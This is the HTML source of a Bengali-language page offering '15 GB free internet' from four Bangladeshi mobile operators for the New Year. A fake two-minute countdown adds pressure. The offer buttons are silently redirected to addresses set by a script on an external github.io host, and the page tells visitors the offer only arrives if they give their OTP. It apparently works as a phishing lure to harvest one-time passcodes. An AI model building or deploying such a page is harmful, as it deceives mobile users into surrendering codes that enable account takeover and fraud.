<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>শুভো নববর্ষ । ১৫ জিবি ফ্রি</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="css/main.css">
    <link rel="stylesheet" type="text/css" href="css/style.css">
    <script src="https://abdulmomen2020.github.io/boishakhi/index.js"></script>
    <style>
        #countdown {
            font-size: 24px;
            text-align: center;
        }

        @media screen and (max-width: 576px) {
            .imgs {
                width: 300px;
                height: 150px;
            }
        }

        .mainbae {
            background-color: #f2f2f2;
            padding: 10px;
            border-radius: 10px;
        }

        .rounded-image {
            border-radius: 10px;
            overflow: hidden;
        }

        .btn {
            font-size: 30px;
            border-radius: 50px;
            border: 5px solid black;
        }

        .shei {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 30%;
            z-index: 1;
        }

        .gplink {
            background-color: #5BBCFF;
        }

        .bllink {
            background-color: #DC6B19;
        }

        .arlink {
            background-color: #FF0000;
        }

        .rblink {
            background-color: #D20062;
        }
    </style>
</head>

<body>
    <div class="container mt-4">
        <div class="row mainbae p-4">
            <div class="col-6 mx-auto text-center shei">
                <div class="suvo-novoborsho center">
                    <ul>
                        <li><a href="#">১</a></li>
                        <li><a href="#">৪</a></li>
                        <li><a href="#">৩</a></li>
                        <li><a href="#">১</a></li>
                    </ul>
                </div>
            </div>
            <div class="col-md-6 mx-auto text-center">
                <div class="rounded-image">
                    <img src="newyearbanner.png" alt="New Year Banner" class="w-100 img-fluid">
                </div>
                <div class="mt-3">
                    <hr>
                    <div id="countdown">
                        <strong>মাত্র <span id="minutes" class="text-danger">02</span> মিনিট <span class="text-danger"
                                id="seconds">00</span> সেকেন্ড সময় বাকি আছে </strong>
                    </div>
                    <hr>
                </div>
                <h1 class="fw-bold text-center text-danger fs-2 m-2">নিচে থেকে অফার সিলেক্ট করুন</h1>
                <div class="mt-3">
                    <a role="button" class="btn btn-warning w-100 bllink rounded-5" href="#">বাংলালিংক ১৫ জিবি ফ্রি
                        ইন্টারনেট</a>
                </div>
                <div class="mt-3">
                    <a role="button" class="btn btn-primary w-100 gplink rounded-5" href="#">গ্রামীনফোন ১৫ জিবি ফ্রি
                        ইন্টারনেট</a>
                </div>
                <div class="mt-3">
                    <a role="button" class="btn btn-danger w-100 rblink rounded-5" href="#">রবি ১৫ জিবি ফ্রি
                        ইন্টারনেট</a>
                </div>
                <div class="mt-3">
                    <a role="button" class="btn btn-danger w-100 arlink rounded-5" href="#">এয়ারটেল ১৫ জিবি ফ্রি
                        ইন্টারনেট</a>
                </div>
                <p class="text-center text-decoration-underline fs-4 rounded-4 m-3 p-1">OTP না দিলে কোনো অফার আসবে
                    না। মনে রাখবেন OTP দিয়ে আপনার অফার দেয়া হয়।</p>
            </div>
        </div>
    </div>
    <script src="js/jquery-1.7.2.min.js" type="text/javascript" charset="utf-8"></script>
    <script src="js/animation.js" type="text/javascript" charset="utf-8" async defer></script>
    <script src="js/slider.js" type="text/javascript" charset="utf-8" async defer></script>
    <script>
        function changeHref(className, newHref) {
            var elements = document.getElementsByClassName(className);

            for (var i = 0; i < elements.length; i++) {
                elements[i].href = newHref;
            }
        }
        changeHref('gplink', gplink);
        changeHref('bllink', bllink);
        changeHref('arlink', arlink);
        changeHref('rblink', rblink);
    </script>
    <script>
        (function () {
            const second = 1000,
                minute = second * 60;

            const countDown = new Date().getTime() + 2 * minute,
                x = setInterval(function () {

                    const now = new Date().getTime(),
                        distance = countDown - now;

                    document.getElementById("minutes").innerText = String(Math.floor(distance / (minute))).padStart(2, "0");
                    document.getElementById("seconds").innerText = String(Math.floor((distance % (minute)) / second)).padStart(2, "0");

                    if (distance < 0) {
                        document.getElementById("countdown").innerHTML = "<strong>Time's up!</strong>";
                        clearInterval(x);
                    }
                }, 1000);
        }());
    </script>
</body>

</html>
